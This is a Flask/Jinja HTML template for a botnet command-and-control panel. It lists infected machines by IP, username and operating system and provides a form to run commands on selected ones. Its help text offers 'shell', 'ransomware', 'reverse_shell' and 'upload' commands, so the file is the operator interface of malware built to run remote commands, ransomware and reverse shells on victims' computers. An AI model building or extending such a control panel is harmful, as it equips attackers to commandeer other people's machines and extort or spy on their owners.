{% extends 'bootstrap/base.html' %}


{% block content %}
<div class="container">
	<form method="post" action="{{ url_for('api.mass_exec') }}">
		
		<table class="table">
			<tr>
				<th>ID</th>
				<th>IP</th>
				<th>Username</th>
				<th>OS</th>
				<th>Select</th>
			</tr>
				
			{% for bot in bots %}
			<tr>
				<td>{{bot.id}}</td>
				<td>{{bot.ip}}</td>
				<td>{{bot.username}}</td>
				<td>{{bot.os}}</td>
				<td><input type="checkbox" id = "checkbox_{{bot.id}}" name="selection" value="{{bot.id}}"></td>
			</tr>
			{% endfor %}
		</table>
		<input type="text" name="cmd" id="cmd" class="form-control"/>
		<input type="submit" name="exec" value="execute on selection" class="btn btn-danger" />
	
	</form>	
		<h3>Commands Overview</h3>
			<p>Shell commands can be performed just type the command into the input and execute however keep in mind that different platforms have different commands for same operations, such as dir (windows) and ls (unix)
			usage:
				shell <command>
				ransomware
				reverse_shell
				upload 

			</p>
</div>
{% endblock %}